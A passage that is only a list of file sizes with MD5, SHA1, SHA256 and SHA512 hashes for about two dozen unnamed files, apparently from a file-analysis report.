SHA5122f611a142156106700ebd8606c46c78ae0018b678ba44ed2327bfb3819e236f8eb5400b8c5548a7577748adde7d247023269e688ac54f799a189eee397088a23
-
Filesize
410KB
MD5014da66be92c1b4e6931de29298e9534
SHA1f00491dacab416665c6358ef9dbdbc49d1b6f3e8
SHA256ea8871248a1862dd2c1fbff9412bae4d2fbcc099bd6366b18ddc519316d12005
SHA5122823417640f5a05152bd34fb13528c0b9079a856125bb0d822f125a9faff67f8ddd2879c5100f601199fb6691796c2887ea67acc87697bdcb9227b81cd6e0b07
-
Filesize
765KB
MD556132ccb78cf250bc2f40981ec09e80c
SHA15e789bf184f445b60678337b48259fcca1448058
SHA25616dcab3a00724d6fb6e471367a91e7a305b9b20627491075f23b7d416362b7bf
SHA512ee5e276c9ad6eb5ef2f7aa12e68f34439b7e68be741071736bdbc98c2c6aabb236790d5eb30ea55f70035128dd8311d6bc2fbef0b52f76a34df1dd1fd4241e4c
-
Filesize
369KB
MD5b344c2bb91d9825e50800ec5198270a9
SHA14faaae44b2cd41f7ad17a0d5d4eb319e769af98a
SHA2561062101b08e38e14082c6aff807218ae2c42c4cd38f8d0a316fff22e056801da
SHA512f769f6bc6568fa448bd4d9a1fca4029ce3189b0ca6da3ea2d79391d9228948ed8eaddbc7075bfb6fda64b0f0f897854ee3fea3c0807aca6b34a1e47dcbd7d9b1
-
Filesize
195KB
MD5f54d6071bcba866b6a9b2abd62a4810a
SHA1f6bf18b3c13e678ad2e720ccb11c144149fed0fc
SHA25607c898893a7b355a9216ce03b7a3a36aa4b7f0d54194e4051583196abd5d4800
SHA5121367d962b40adad3f787299c78469263aa1cde44c207e37a5a865cf5762fcec6fb7630c83aa9d86ad405048b93beae79812e4d63def2e33b78d0d3d490d68fcc
-
Filesize
383KB
MD5dc9ea7a1fa4cacfc7ea4f556209867a3
SHA15845510a12f514805be4ed1e3778a044ec56efaa
SHA2564bc99f4d634ae70eaef6231aa291e07f448188949a4843126946c8a9b6ea3180
SHA512d6a8b0155b4e272dc007c71aecc721a0bb6264634311c3bdadaba6700e58912a0feca5851a85111b2b28947c81ecee3426c26ebff6ed310559c26d25b1b54dbf
-
Filesize
302KB
MD5dd024e3261af93cbd47059598d0fb03d
SHA1bb6b25cc6fa7f632f26830260674c6bf7c157876
SHA2560f565398bf0266cec92b6843fcf88e32462fe896d26702fd87860c2e17ae84e7
SHA512e96903c0ee6ba4b71ebf65d7dbb001dba00d2eca3cc1a039ee2c7ac5441b1fba3ecee0371c07b706f5cc057cc5ce084f3c12a99cb02d6be4438ac28dbd102699
-
Filesize
209KB
MD596c3d63d288f3c4a0726a7f664a1d264
SHA1429700360872f22612d1c56f256a65ea64621caf
SHA2569a9463e62a68c63a0ff0eb8bff1bac9d5a2f269c57929ffcf6d787630721b483
SHA512f54cd912dfc4081b2ea8362816bad150b4d1f03c1ec66299bb9ae6840727d60f10f9fd324a3f6f7ac30e33454b2a450fab4ea4db54c83696cafbef17f065af66
-
Filesize
356KB
MD53c0023fd7e963c3209549c0cf938c384
SHA1afecb3f07996bed6b8e8bd37762782914645b674
SHA2564f67bf3ded6ca9fee78e5bd57ed9fc1486dbfa9f24c2e6fe8a06606788b44969
SHA512751b4aa23a6c3071a33a5e530626663115afedfa273e477b874e5b050a9744a24afa570dbc02e73d970cfdbad63f56377b2977a4146fd85bbbcd5e243fbf1b03
-
Filesize
530KB
MD5750b582b721569e5849e254b97eb4c79
SHA1daf7e120f07bd6120d3d3bd3c30f1af7c88be8d4
SHA2563339acb038970569276eb94413c69b2d958c5d68fb2e7c10daac39ce1d259110
SHA51215931b5206305251c7d85e79248a6322ee1cef4eaa67ede8cb6d029dda4788eeb3346da96130df683ab3eed1ae138f22207cce2ebfdfb761e837f5c1dbaa4b95
-
Filesize
276KB
MD5330b78160ba6470896faeffc3df7f9e8
SHA1bcb54812f1cab5fddd77b4b396284c5f6085dfbe
SHA256eeb27c7c589d148bd18266af0b8e6a819d4e2334078be8ace0a3a16e330dc383
SHA51202dcf20c6a0d2d0bc3ab1a13bc4ffc0a55436d31afe5380e0f8b81e20ef4c1cb55309c26663a61fa405b7e95c26b20abfd5c760d3554d8ac9fed3dd2f39d7389
-
Filesize
450KB
MD5bc2898e4df4b7cb645563cd9e1db65e7
SHA111cea72d3047d63d6b2d20e9fb3a1fb7069ca516
SHA25601127362352ed90d5393decc1380fad77f53553f6216e456c1cc44a95c50cfcc
SHA5122cd4adab4fc4011b45408b76533ab6264ec97a1b085b3c791c27de8c37d63ec75e23ead356ab66a0f9adc196eee5a5b4cd69a4c7ebdc6b462f01e1648dfb2d72
-
Filesize
423KB
MD53174a6fcb2dd74cfdfff3455dab5c77e
SHA13ef74811c188f1d9fb244f0bde1c11f88b81ecd1
SHA256b12567bbb8ddce83608de59d94c2b5dfc41d61eb52c9e0e823ef507eca2fc185
SHA512fe901d9870201843e1ad95e7347c02f69bf9bda24078a518512401be05adb506a69072acbdb35d5dc040ccc90d0282c4eeade26524bedecfcc214a59b3a83a69
-
Filesize
329KB
MD5de6510cde9fe9fb24edd74840bbce7f9
SHA191986c44a624c3bb3d7f12bdf580e0c550d5fcad
SHA256d8c032a541d4bdad89e4441330d431af5bff3e1a1968ea4c30698c052078262d
SHA5128ac1035a5cfc477a6d8bf7c4947dfe4a0e5e0f2d7dff271e8887df1f0e8097a09d8f186e9b6354fd75231ecb4bf58f628c5a6343d52161562ccb5ead7c37f2e0
-
Filesize
517KB
MD5a26f4082a2ca34a7f9a7b0fdacd2fbab
SHA1e9547f880ebe294d6404a23addb4f52fa651a32b
SHA256b01d091841dfc23587451d56ddd0dbaa6cb60304a1632e1c1316846f112754d7
SHA51202d3c9df05d42d1d6c8f9cd6e3faf1a1166b9cf341b406e28432241e28475c9ead7d50e8e718aef29fa0081cb8015daa9df710521ed03edf96911e72327b0574
-
Filesize
544KB
MD51340f52dc394072c5a20177c433690aa
SHA13e188123fc36cd456f340811c47b1a7dd150485d
SHA256d2e99bb82f24ac628241a1877fcc4c92e23e8216bbc4fbf144fa17459f40ba5f
SHA5127519b564888d716d40d9d8eccf2fb1056c11e0f01ce9b7cb90f934a83b9ec424cdb3013456d5be4b8929c3015c2e58dbee78ee98c2aad2c053d609b1ccb9783d
-
Filesize
503KB
MD59cba1a27b4bb8bba6305f3b2fa5ed468
SHA1f50bf6abd0bad270e2434559e07839f79b8e0fb9
SHA256a33ce89785e367866d1c8a24be128b814829c58a1160cc64e4cc63911aea94d0
SHA512f2aa6f8404b448f9194444cd40231a5964737c73eab7745c7bad80cac51a44221dffe42a2959db21b22f09e5b32bf19f10bf6df6532f306d70eada8ad767b2fc
-
Filesize
222KB
MD525444b3573c678a4d0a5656422ab6b1c
SHA140ba775916471cdde454740ba01d921107510ae4
SHA2569be64eb523b79d2a3acdc23d63f7fb3f5080c4bff33bcbe9bb2b6f818212fb1c
SHA51284d0e32941aa55d6b9d2253a3b929ae458823c4efb56cd5d86c85a42f06ec3295c88ad4cc9400f512a3423d106b33ace20230b20b6c1bf4f49ffae119a95623f
-
Filesize
477KB
MD538bc5bd054e073eaee57fc6cce4c7573
SHA1ae2fae2ff8cf1a36ad73e090f199324b4fbf5fd4
SHA256f77f0ed60f152eab423043c40d93e89c6e57c2707963e7fbbd0554f9178f0eef
SHA5123ef284f027a16c3f639a4f8b206cf02520bdbffd04af733171977dc0d0e4b9604f35f4484383f56bdfc9a7f9ab8915a02af2f2671c412c9c94b85e3c565396b2
-
Filesize
436KB
MD51712ee56541c1db0eede4630798c9703
SHA1fa6674da4a1a58685adccdfd4e496eee1458bc4b
SHA2569f84703adb9e7dbc755e1dbb2c4130082feeab9b5df7f84bfe747e579dc02865
SHA512ccbf994a8d28be7db3b260d59f1ffa0c4c5b72c43e11eccfbe4e9b354d2aba5c697994ef90887bb49c0a6b5c5896c83dae6b90ab406b2b5406d8a726bfc69dbd
-
Filesize
490KB
MD5f1941739760bbe1b0dacd8612f0d1e78
SHA13533c20b74cafc62374b115d0c4a93b72e91597a
SHA256bcb3782fe176c41fcaeeb9a6f86783848896bd8c49512f3e62658abfeebe9fa4
SHA51226b41d25e3b6aaf457ae828ca601c752922f93caee7386a854e2381394d28c72c244deaebe0ef9fd3ba56c1bca22cba75b7908928dac1689aa9c481ec2a3c4ba
-
Filesize
289KB
MD526d2d57147dfed835cb157da2396d39e
SHA13aa9ad515da853c61a0baa54cefd67517110bf08
SHA256c3220c99bc2f1c88ac66b5a85e057fe2c414ccd6d3c0e1790d5a4da556beaa7e
SHA512a3bf5dc4712d324cd250698153127fcb308c8f58a1902339b1d1b92424ea4a6b27339944981d5d8d6c1cb05502da8df1b43bc3ca2659c5cd39944a834206f20d
-
Filesize
343KB
MD5c37a1f7ef0972d156bb21c824e5f6bcb
SHA1ada83428fd90ac657b17985b318b3bc21ea6b017
SHA2567fdb41d05db183973003d24da186bc1ee109e0dc7ebcbd3d2af4f336a20b3d5b
SHA512d1d48e068d784668edd0052d050346d3f1d9dc0684aaaee695a2016f69f2ba7b208be49268bf5b2fad342f97d62bc6dbb6f822555e3ce9bce57cf0123a80da57
-
Filesize
262KB
MD54788d520a901ff52a788c16b32954a91
SHA13ce59be2463f20c344be739a6b132cc78e2643d6
SHA256869585d425a0a7069ca8b61fbe005c8c2fcdd43f5c29719245032eb032b9eec4
SHA51278aebbf30d2803e280df8308f46ed5a0620a4a709bf4882fe6c9cdbc843b164834b45ce09ff607f469a42e83f6ce71f57c5e7e7fcc462131e6e694ee06958efe
-
Filesize
83KB
MD5a5c5899576484d02982ef1b1fd339d84
SHA1045a4f4d5150178b7a3e0c9f88bf998f6b3c91ae
SHA2567463c0bbd59f09186e5fb40942ec3e5fd795424074ae9fcda6ba691ea5b593da
SHA512c136c263cd7c9734c1980cda257e3f0b882f37c2505045b4357018e248938e1d20f79b100073e2e5e7b51f279c0e6c1fd891fae10428adf86d05a124563bddf9